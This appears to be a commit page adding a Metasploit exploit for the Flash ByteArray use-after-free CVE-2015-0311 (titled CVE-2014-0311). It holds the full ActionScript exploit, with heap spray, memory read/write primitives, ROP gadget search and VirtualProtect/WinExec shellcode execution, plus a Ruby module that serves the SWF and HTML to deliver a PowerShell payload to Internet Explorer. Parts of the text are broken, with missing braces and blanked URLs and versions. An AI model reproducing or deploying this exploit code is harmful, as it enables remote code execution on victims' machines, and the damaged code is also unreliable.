Land #4901, CVE-2014-0311, Flash ByteArray Uncompress UAF

bug/bundler_fix blog-20150311
sinn3r 2015-03-11 14:04:17 -05:00
commit 215c209f88
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
3 changed files with 349 additions and 0 deletions

Binary file not shown.

external/source/exploits/CVE-2015-0311/ vendored Executable file
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@ -0,0 +1,242 @@
// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 2. Be support to support 16.0 as target-player (flex-config.xml).
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// 5. Build with: mxmlc -o msf.swf
// Original code by @hdarwin89 //
// Modified to be used from msf
import flash.display.Sprite;
import flash.display.LoaderInfo;
import flash.system.ApplicationDomain;
import flash.utils.ByteArray;
import avm2.intrinsics.memory.casi32;
import flash.external.ExternalInterface;
import mx.utils.Base64Decoder;
public class Main extends Sprite
private var data:uint = 0xdeaddead
private var uv:Vector.<Object> = new Vector.<Object>
private var ba:ByteArray = new ByteArray()
private var spray:Vector.<Object> = new Vector.<Object>(51200)
private var b64:Base64Decoder = new Base64Decoder();
private var payload:String = "";
/*public static function log(msg:String):void{
var str:String = "";
str += msg;
if(ExternalInterface.available){"alert", str);
public function Main()
payload = b64.toByteArray().toString();
for (var i:uint = 0; i < 1000; i++) ba.writeUnsignedInt(data++)
ApplicationDomain.currentDomain.domainMemory = ba
ba.position = 0x200
for (i = 0; i < ba.length - ba.position; i++) ba.writeByte(00)
try {
} catch (e:Error) { }
uv[0] = new Vector.<uint>(0x3E0)
casi32(0, 0x3e0, 0xffffffff)
for (i = 0; i < spray.length; i++) {
spray[i] = new Vector.<Object>(1014)
spray[i][0] = ba
spray[i][1] = this
0:008> dd 5ca4000
05ca4000 ffffffff 05042000 05ca4000 00000000
05ca4010 00000000 00000000 00000000 00000000
05ca4020 00000000 00000000 00000000 00000000
05ca4030 00000000 00000000 00000000 00000000
05ca4040 00000000 00000000 00000000 00000000
05ca4050 00000000 00000000 00000000 00000000
05ca4060 00000000 00000000 00000000 00000000
05ca4070 00000000 00000000 00000000 00000000
uv[0][0] = uv[0][0x2000003] - 0x18 - 0x2000000 * 4
//log("uv[0][0]: " + uv[0][0].toString(16));
ba.endian = "littleEndian"
ba.length = 0x500000
var buffer:uint = vector_read(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8) + 0x100000
//log("buffer: " + buffer.toString(16));
var main:uint = uv[0][0x2000009] - 1
//log("main: " + main.toString(16));
var vtable:uint = vector_read(main)
//log("vtable: " + vtable.toString(16));
vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8)
vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 16, 0xffffffff)
var flash:uint = base(vtable)
//log("flash: " + flash.toString(16));
// Because of the sandbox, when you try to solve kernel32
// from the flash imports on IE, it will solve ieshims.dll
var ieshims:uint = module("kernel32.dll", flash)
//log("ieshims: " + ieshims.toString(16));
var kernel32:uint = module("kernel32.dll", ieshims)
//log("kernel32: " + kernel32.toString(16));
var ntdll:uint = module("ntdll.dll", kernel32)
//log("ntdll: " + ntdll.toString(16));
var urlmon:uint = module("urlmon.dll", flash)
//log("urlmon: " + urlmon.toString(16));
var virtualprotect:uint = procedure("VirtualProtect", kernel32)
//log("virtualprotect: " + virtualprotect.toString(16));
var winexec:uint = procedure("WinExec", kernel32)
//log("winexec: " + winexec.toString(16));
var urldownloadtofile:uint = procedure("URLDownloadToFileA", urlmon);
//log("urldownloadtofile: " + urldownloadtofile.toString(16));
var getenvironmentvariable:uint = procedure("GetEnvironmentVariableA", kernel32)
//log("getenvironmentvariable: " + getenvironmentvariable.toString(16));
var setcurrentdirectory:uint = procedure("SetCurrentDirectoryA", kernel32)
//log("setcurrentdirectory: " + setcurrentdirectory.toString(16));
var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
//log("xchgeaxespret: " + xchgeaxespret.toString(16));
var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
//log("xchgeaxesiret: " + xchgeaxesiret.toString(16));
// CoE
byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
byte_write(0, "\x89\x03", false) // mov [ebx], eax
byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
byte_write(buffer+0x200, payload);
byte_write(buffer + 0x20070, xchgeaxespret)
byte_write(buffer + 0x20000, xchgeaxesiret)
byte_write(0, virtualprotect)
// VirtualProtect
byte_write(0, winexec)
byte_write(0, buffer + 0x30000)
byte_write(0, 0x1000)
byte_write(0, 0x40)
byte_write(0, buffer + 0x100)
// WinExec
byte_write(0, buffer + 0x30000)
byte_write(0, buffer + 0x200)
byte_write(main, buffer + 0x20000)
private function vector_write(addr:uint, value:uint = 0):void
addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] = value : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1] = value
private function vector_read(addr:uint):uint
return addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1]
private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
if (addr) ba.position = addr
if (value is String) {
for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
if (zero) ba.writeByte(0)
} else ba.writeUnsignedInt(value)
private function byte_read(addr:uint, type:String = "dword"):uint
ba.position = addr
switch(type) {
case "dword":
return ba.readUnsignedInt()
case "word":
return ba.readUnsignedShort()
case "byte":
return ba.readUnsignedByte()
return 0
private function base(addr:uint):uint
addr &= 0xffff0000
while (true) {
if (byte_read(addr) == 0x00905a4d) return addr
addr -= 0x10000
return 0
private function module(name:String, addr:uint):uint
var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80)
var i:int = -1
while (true) {
var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
if (!entry) throw new Error("FAIL!");
ba.position = addr + entry
var dll_name:String = ba.readUTFBytes(name.length).toUpperCase();
if (dll_name == name.toUpperCase()) {
return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)));
private function procedure(name:String, addr:uint):uint
var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
var numberOfNames:uint = byte_read(eat + 0x18)
var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
var addressOfNames:uint = addr + byte_read(eat + 0x20)
var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
for (var i:uint = 0; ; i++) {
var entry:uint = byte_read(addressOfNames + i * 4)
ba.position = addr + entry
if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
private function gadget(gadget:String, hint:uint, addr:uint):uint
var find:uint = 0
var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
var value:uint = parseInt(gadget, 16)
for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
return addr + i

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@ -0,0 +1,107 @@
# This module requires Metasploit:
# Current source:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
'Description' => %q{
This module exploits an use after free vulnerability in Adobe Flash Player. The
vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
to uncompress() a malformed byte stream. This module has been tested successfully
on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash, and
'License' => MSF_LICENSE,
'Author' =>
'Unknown', # Vulnerability discovery and exploit in the wild
'hdarwin', # Public exploit by @hdarwin89
'juan vazquez' # msf module
'References' =>
['CVE', '2015-0311'],
['URL', ''],
['URL', ''],
['URL', '']
'Payload' =>
'DisableNops' => true
'Platform' => 'win',
'BrowserRequirements' =>
:source => /script|headers/i,
:os_name => OperatingSystems::Match::WINDOWS_7,
:ua_name => Msf::HttpClients::IE,
:flash => lambda { |ver| ver =~ /^16\./ && ver <= '' },
:arch => ARCH_X86
'Targets' =>
[ 'Automatic', {} ]
'Privileged' => false,
'DisclosureDate' => 'Apr 28 2014',
'DefaultTarget' => 0))
def exploit
@swf = create_swf
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
b64_payload = Rex::Text.encode_base64(psh_payload)
html_template = %Q|<html>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
return html_template, binding()
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
swf =, 'rb') { |f| swf = }